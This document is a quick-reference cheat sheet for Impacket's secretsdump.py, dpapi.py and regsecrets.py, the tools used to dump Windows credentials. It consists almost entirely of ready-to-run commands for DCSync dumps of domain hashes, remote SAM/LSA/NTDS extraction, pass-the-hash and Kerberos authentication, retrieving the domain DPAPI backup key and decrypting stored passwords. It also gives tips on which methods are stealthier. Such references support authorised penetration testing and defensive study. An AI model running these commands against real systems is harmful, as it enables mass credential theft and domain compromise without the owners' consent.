Impacket β Credential Dumping
Quick Reference
| Tool | Purpose |
|---|---|
secretsdump.py |
Dump SAM, LSA secrets, cached creds, NTDS.DIT (DRSUAPI/VSS/DCSync) |
dpapi.py |
Decrypt DPAPI-protected secrets (masterkeys, credentials, vaults) |
regsecrets.py |
Dump SAM/LSA/MSCache remotely via registry without VSS or DRSUAPI |
secretsdump.py
Dump secrets from a remote machine or local hive files without running an agent on the target.
Syntax:
secretsdump.py [options] <domain>/<username>:<password>@<target>
# or LOCAL for offline parsing:
secretsdump.py -sam <sam> -system <system> -security <security> LOCAL
Common Usage:
# Remote live dump β SAM + LSA secrets + cached creds (password)
secretsdump.py <domain>/<username>:<password>@<target>
# Pass-the-Hash
secretsdump.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>
# Kerberos (ccache)
KRB5CCNAME=<ticket> secretsdump.py -k -no-pass <domain>/<username>@<target>
# AES key
secretsdump.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target>
# DCSync β dump all NTLM hashes from DC (DRSUAPI)
secretsdump.py -just-dc <domain>/<username>:<password>@<dc-ip>
# DCSync β NTLM hashes only
secretsdump.py -just-dc-ntlm <domain>/<username>:<password>@<dc-ip>
# DCSync β single user
secretsdump.py -just-dc-user <username> <domain>/<username>:<password>@<dc-ip>
# DCSync with hash history
secretsdump.py -just-dc -history <domain>/<username>:<password>@<dc-ip>
# DCSync β include pwd last set and account status
secretsdump.py -just-dc -pwd-last-set -user-status <domain>/<username>:<password>@<dc-ip>
# Save all output to files
secretsdump.py -just-dc -outputfile <output> <domain>/<username>:<password>@<dc-ip>
# VSS method (for DC NTDS via shadow copy)
secretsdump.py -use-vss <domain>/<username>:<password>@<dc-ip>
# VSS with specific exec method
secretsdump.py -use-vss -exec-method wmiexec <domain>/<username>:<password>@<dc-ip>
# Remote Shadow Snapshot via WMI (SAM/SYSTEM/SECURITY)
secretsdump.py -use-remoteSSWMI <domain>/<username>:<password>@<target>
# Remote Shadow Snapshot including NTDS (DC)
secretsdump.py -use-remoteSSWMI -use-remoteSSWMI-NTDS <domain>/<username>:<password>@<dc-ip>
# Parse local SAM + SYSTEM (offline)
secretsdump.py -sam SAM -system SYSTEM LOCAL
# Parse local SAM + SYSTEM + SECURITY (offline)
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
# Parse NTDS.DIT offline
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
# Parse NTDS.DIT offline β NTLM only
secretsdump.py -ntds ntds.dit -system SYSTEM -just-dc-ntlm LOCAL
# Skip SAM, only LSA
secretsdump.py -skip-sam <domain>/<username>:<password>@<target>
# Resume interrupted NTDS dump
secretsdump.py -resumefile resume.bin -just-dc <domain>/<username>:<password>@<dc-ip>
# LDAP filter (dump specific users)
secretsdump.py -ldapfilter '(memberOf=CN=Domain Admins,CN=Users,DC=<domain>,DC=local)' \
<domain>/<username>:<password>@<dc-ip>
Options:
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP
- -target-ip <target> β Target IP override
- -just-dc β NTDS only (NTLM hashes + Kerberos keys)
- -just-dc-ntlm β NTDS only (NTLM hashes, no Kerberos keys)
- -just-dc-user <username> β NTDS for a single user
- -ldapfilter <filter> β NTDS filtered by LDAP query
- -history β Include password history and LSA OldVal
- -pwd-last-set β Show pwdLastSet for each NTDS account
- -user-status β Show enabled/disabled status
- -outputfile <output> β Base filename for output files
- -use-vss β VSS method (vs default DRSUAPI)
- -exec-method [{smbexec,wmiexec,mmcexec}] β Exec method for VSS
- -use-remoteSSWMI β Shadow copy via WMI (no agent)
- -use-remoteSSWMI-NTDS β Also dump NTDS when using WMI shadow copy
- -system <file> β Local SYSTEM hive
- -sam <file> β Local SAM hive
- -security <file> β Local SECURITY hive
- -ntds <file> β Local NTDS.DIT file
- -bootkey <key> β Bootkey for offline SYSTEM hive
- -skip-sam / -skip-security β Skip specific hive parsing
- -resumefile <file> β Resume interrupted NTDS dump
Notes:
- DCSync (-just-dc) requires: Domain Admin, or DCSync rights (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All)
- VSS method is noisier but works when DRSUAPI is blocked
- Remote WMI shadow copy (-use-remoteSSWMI) is stealthier than VSS on non-DCs
dpapi.py
Decrypt DPAPI-protected secrets β browser passwords, Wi-Fi keys, credential manager entries, RDP creds.
Syntax:
dpapi.py <action> [options]
Actions:
- backupkeys β Retrieve domain DPAPI backup key from DC
- masterkey β Decrypt a DPAPI masterkey
- credential β Decrypt a DPAPI credential file
- vault β Decrypt a vault credential
- unprotect β CryptUnprotectData on a blob
- credhist β Parse CREDHIST file
Common Usage:
# Get domain DPAPI backup key (from DC β needed to decrypt any user's masterkeys)
dpapi.py backupkeys -t <domain>/<username>:<password>@<dc-ip> -export
# Decrypt masterkey with domain backup key
dpapi.py masterkey -file <masterkey-file> -pvk domain_backup.pvk
# Decrypt masterkey with user password
dpapi.py masterkey -file <masterkey-file> -sid <sid> -password <password>
# Decrypt masterkey with NT hash
dpapi.py masterkey -file <masterkey-file> -sid <sid> -hash <nt-hash>
# Decrypt a credential file using plaintext masterkey
dpapi.py credential -f <credential-file> -key <masterkey-hex>
# Decrypt a vault credential
dpapi.py vault -vcrd <vcrd-file> -key <masterkey-hex>
# CryptUnprotectData on a blob
dpapi.py unprotect -f <blob-file> -key <masterkey-hex>
Notes:
- Domain backup key decrypts any user's masterkeys in the domain
- Masterkey files: %APPDATA%\Microsoft\Protect\<SID>\
- Credential files: %APPDATA%\Microsoft\Credentials\
- Vault files: %LOCALAPPDATA%\Microsoft\Vault\
- Pair with secretsdump to get DPAPI system masterkeys
regsecrets.py
Remotely dump SAM, MSCache (cached domain credentials), and LSA secrets via registry β lighter than secretsdump, no VSS or DRSUAPI.
Syntax:
regsecrets.py [options] <domain>/<username>:<password>@<target>
Common Usage:
# Full dump (SAM + cache + LSA)
regsecrets.py <domain>/<username>:<password>@<target>
# Pass-the-Hash
regsecrets.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>
# Kerberos (ccache)
KRB5CCNAME=<ticket> regsecrets.py -k -no-pass <domain>/<username>@<target>
# AES key
regsecrets.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target>
# SAM only
regsecrets.py -nocache -nolsa <domain>/<username>:<password>@<target>
# LSA secrets only
regsecrets.py -nosam -nocache <domain>/<username>:<password>@<target>
# Save output to file
regsecrets.py -outputfile <output> <domain>/<username>:<password>@<target>
# Include password history
regsecrets.py -history <domain>/<username>:<password>@<target>
# With throttle to reduce noise
regsecrets.py -throttle 2 <domain>/<username>:<password>@<target>
# Provide local SYSTEM hive for bootkey (offline-assisted)
regsecrets.py -system <system-hive> <domain>/<username>:<password>@<target>
Options:
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP
- -target-ip <target> β Target IP override
- -nosam β Skip SAM
- -nocache β Skip MSCache (cached domain credentials)
- -nolsa β Skip LSA secrets
- -history β Dump password history
- -outputfile <output> β Base filename for output
- -throttle <seconds> β Delay between operations
- -system <file> β Local SYSTEM hive for bootkey
- -bootkey <key> β Direct bootkey hex